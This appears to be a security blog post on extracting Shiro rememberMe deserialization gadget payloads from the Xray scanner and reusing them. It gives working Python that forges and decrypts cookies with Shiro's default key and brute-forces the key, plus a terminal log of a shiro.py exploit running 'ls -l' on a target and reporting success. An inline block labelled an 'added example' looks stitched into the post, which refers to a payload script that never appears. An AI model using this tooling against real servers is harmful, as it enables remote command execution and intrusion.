Shiro Deserialization: Extracting the 6 Tomcat Echo Gadget Payloads from Xray

Extracting the Deserialization Payloads from Xray

The new Xray release supports Shiro deserialization detection, provided you hold an Advanced (paid) license.

Shiro detection runs in three stages: it first tries the 6 echo gadgets encrypted with Shiro's default rememberMe key, then falls back to the reverse-connection (out-of-band callback) platform, and only after all of that fails does it brute-force the cookie with its 100 built-in keys.

The valuable part is those 6 payloads, which give command echo on every Tomcat version.

They are: CommonsCollections1, CommonsCollections2, CommonsBeanutils1, CommonsBeanutils2, Jdk7u21 and Jdk8u20.

Once a payload has been captured, decrypt it (the rememberMe value is AES-CBC under the key, with the 16-byte IV prepended) and save the raw serialized object as base64. From then on it can be reused directly: because the stored form is the plaintext gadget, it still works after the target's key changes, as long as you re-encrypt with the key you actually have.
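To make the reuse step concrete, below is an added example (it is not the page's shiro.py and not Xray's code) of the cookie handling described above and of the decrypt-and-check loop that the key brute-force stage relies on. It decrypts a rememberMe value with Shiro's well-known default key kPH+bIxk5D2deZiIxcaaaA== to recover the serialized object, stores it as base64, re-wraps it under a different key, and identifies the right key from a candidate list by checking PKCS#7 padding and the Java serialization magic bytes. The "captured" cookie is constructed inline from a stand-in byte string rather than a real gadget chain, and the second key is a made-up placeholder; AES comes from pycryptodome or cryptography, whichever is installed.

```python
import base64
import os

# Shiro 1.2.4's publicly known default rememberMe key.
DEFAULT_KEY_B64 = "kPH+bIxk5D2deZiIxcaaaA=="
# Hypothetical "changed" key used only for the demonstration below.
NEW_KEY_B64 = base64.b64encode(b"0123456789abcdef").decode()

# Java serialization stream header: STREAM_MAGIC (0xACED) + STREAM_VERSION (5).
JAVA_SER_MAGIC = b"\xac\xed\x00\x05"

# Shiro's AesCipherService uses AES/CBC/PKCS5Padding and prepends the IV.
# Either AES backend works; both expose the same raw-CBC helper.
try:
    from Crypto.Cipher import AES  # pycryptodome

    def _aes_cbc(key, iv, data, encrypt):
        c = AES.new(key, AES.MODE_CBC, iv)
        return c.encrypt(data) if encrypt else c.decrypt(data)
except ImportError:
    from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes

    def _aes_cbc(key, iv, data, encrypt):
        op = Cipher(algorithms.AES(key), modes.CBC(iv))
        op = op.encryptor() if encrypt else op.decryptor()
        return op.update(data) + op.finalize()


def _pkcs7_pad(data, block=16):
    n = block - len(data) % block
    return data + bytes([n]) * n


def _pkcs7_unpad(data, block=16):
    if not data or len(data) % block:
        raise ValueError("bad length")
    n = data[-1]
    if n < 1 or n > block or data[-n:] != bytes([n]) * n:
        raise ValueError("bad padding")
    return data[:-n]


def shiro_encrypt(key_b64, payload, iv=None):
    """Build a rememberMe cookie value: base64(iv || AES-CBC(key, iv, pad(payload)))."""
    key = base64.b64decode(key_b64)
    iv = iv or os.urandom(16)
    return base64.b64encode(iv + _aes_cbc(key, iv, _pkcs7_pad(payload), True)).decode()


def shiro_decrypt(key_b64, cookie):
    """Inverse of shiro_encrypt; raises ValueError when the key is wrong (bad padding)."""
    key = base64.b64decode(key_b64)
    raw = base64.b64decode(cookie)
    if len(raw) < 32 or len(raw) % 16:
        raise ValueError("cookie is not IV + whole AES blocks")
    return _pkcs7_unpad(_aes_cbc(key, raw[:16], raw[16:], False))


def extract_payload(cookie, key_b64=DEFAULT_KEY_B64):
    """Decrypt a captured cookie and return the serialized object as base64 for later reuse."""
    obj = shiro_decrypt(key_b64, cookie)
    if not obj.startswith(JAVA_SER_MAGIC):
        raise ValueError("decrypted data is not a Java serialization stream")
    return base64.b64encode(obj).decode()


def reencrypt_payload(payload_b64, key_b64):
    """Re-wrap a saved payload under whatever key the target now uses (fresh random IV)."""
    return shiro_encrypt(key_b64, base64.b64decode(payload_b64))


def find_key(cookie, candidate_keys_b64):
    """Key brute-force: a candidate is correct if padding validates and the Java magic appears."""
    for k in candidate_keys_b64:
        try:
            if shiro_decrypt(k, cookie).startswith(JAVA_SER_MAGIC):
                return k
        except ValueError:
            continue
    return None


# Constructed stand-in for a serialized gadget: real Java header plus filler.
# It is NOT a working gadget chain; it only lets the round trip run offline.
SAMPLE_OBJECT = JAVA_SER_MAGIC + b"\x73\x72" + b"constructed-sample-object"
# Simulated "captured" cookie, encrypted under the default key with a fixed IV.
CAPTURED_COOKIE = shiro_encrypt(DEFAULT_KEY_B64, SAMPLE_OBJECT, iv=b"\x00" * 16)


def demo():
    saved = extract_payload(CAPTURED_COOKIE)          # decrypt with the default key, keep base64
    new_cookie = reencrypt_payload(saved, NEW_KEY_B64)  # reuse after the key changed
    assert shiro_decrypt(NEW_KEY_B64, new_cookie) == SAMPLE_OBJECT
    return saved


if __name__ == "__main__":
    print(demo())
```

The magic-byte check is what makes the brute-force reliable: a wrong key will occasionally yield valid-looking PKCS#7 padding by chance, but will not produce the 0xACED0005 header.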

The extracted payloads are included in the script below.

Usage:

╭─[aresx@AresX-Mac]-[~/tools/shiro]  ‹master*›
╰─➤ python3 shiro.py echo CommonsCollections1 http://127.0.0.1:9080/login "ls -l"
Congratulation: exploit success

total 21836
drwxr-xr-x   1 root root     4096 Oct 21  2016 bin
drwxr-xr-x   2 root root     4096 Sep 12  2016 boot
drwxr-xr-x   5 root root      340 Jul 16 06:14 dev
drwxr-xr-x   1 root root     4096 Apr 19 17:37 etc
drwxr-xr-x   2 root root     4096 Sep 12  2016 home
drwxr-xr-x   1 root root     4096 Oct 31  2016 lib
drwxr-xr-x   2 root root     4096 Oct 20  2016 lib64
drwxr-xr-x   2 root root     4096 Oct 20  2016 media
drwxr-xr-x   2 root root     4096 Oct 20  2016 mnt
drwxr-xr-x   2 root root     4096 Oct 20  2016 opt
dr-xr-xr-x 167 root root        0 Jul 16 06:14 proc
drwx------   1 root root     4096 Jul 22 09:53 root
drwxr-xr-x   3 root root     4096 Oct 20  2016 run
drwxr-xr-x   2 root root     4096 Oct 20  2016 sbin
-rw-r--r--   1 root root 22290368 Dec 19  2019 shirodemo-1.0-SNAPSHOT.jar
drwxr-xr-x   2 root root     4096 Oct 20  2016 srv
dr-xr-xr-x  13 root root        0 Jul 21 16:04 sys
drwxrwxrwt   1 root root     4096 Jul 16 06:14 tmp
drwxr-xr-x   1 root root     4096 Oct 31  2016 usr
drwxr-xr-x   1 root root     4096 Oct 31  2016 var
